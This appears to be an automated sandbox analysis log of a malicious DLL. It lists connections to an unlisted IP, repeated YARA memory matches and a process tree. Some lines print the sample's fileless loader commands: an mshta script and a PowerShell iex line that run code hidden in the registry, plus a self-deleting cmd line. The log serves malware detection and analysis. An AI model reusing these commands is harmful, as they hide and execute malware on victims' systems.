Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 |
Source: Yara match | File source: 00000002.00000003.277089715.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277155521.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.327048178.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.328107644.0000000004ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.323863639.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277582302.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277005147.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.276805211.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277047889.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277544043.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.276930570.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6488, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6608, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 1928, type: MEMORYSTR |
Source: Yara match | File source: 2.3.rundll32.exe.4c86b40.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4c86b40.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4bda4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4c594a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4bda4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000002.00000003.326908581.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.396215708.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.394439164.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.395073730.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.326960112.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277089715.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277155521.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.327048178.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.328107644.0000000004ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.323863639.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277582302.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277005147.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.276805211.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277047889.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277544043.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.276930570.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6488, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6608, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 1928, type: MEMORYSTR |
Source: Yara match | File source: 2.3.rundll32.exe.4c86b40.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4c86b40.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4bda4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4c594a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4bda4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000002.00000003.326908581.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.396215708.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.394439164.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.395073730.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.326960112.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\3r0Cgcbr8c.dll" |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3r0Cgcbr8c.dll",#1 |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\3r0Cgcbr8c.dll",#1 |
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Soxq='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Soxq).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gjvyfiw -value gp; new-alias -name huwuvwioi -value iex; huwuvwioi ([System.Text.Encoding]::ASCII.GetString((gjvyfiw "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hvnxdzw.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE3E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1476D44366854E63BD1CA8712B7CCE92.TMP" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iig1japh.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2B5B.tmp" "c:\Users\user\AppData\Local\Temp\CSC8E8486282EA843C08CB8749684F1E69.TMP" |
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\3r0Cgcbr8c.dll |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3r0Cgcbr8c.dll",#1 |
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gjvyfiw -value gp; new-alias -name huwuvwioi -value iex; huwuvwioi ([System.Text.Encoding]::ASCII.GetString((gjvyfiw "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hvnxdzw.cmdline |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iig1japh.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE3E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1476D44366854E63BD1CA8712B7CCE92.TMP" |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2B5B.tmp" "c:\Users\user\AppData\Local\Temp\CSC8E8486282EA843C08CB8749684F1E69.TMP" |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\3r0Cgcbr8c.dll |
Source: Yara match | File source: 00000002.00000003.277089715.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277155521.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.327048178.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.328107644.0000000004ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.323863639.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277582302.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277005147.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.276805211.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277047889.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277544043.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.276930570.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6488, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6608, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 1928, type: MEMORYSTR |
Source: Yara match | File source: 2.3.rundll32.exe.4c86b40.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4c86b40.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4bda4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4c594a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4bda4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000002.00000003.326908581.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.396215708.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.394439164.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.395073730.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.326960112.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
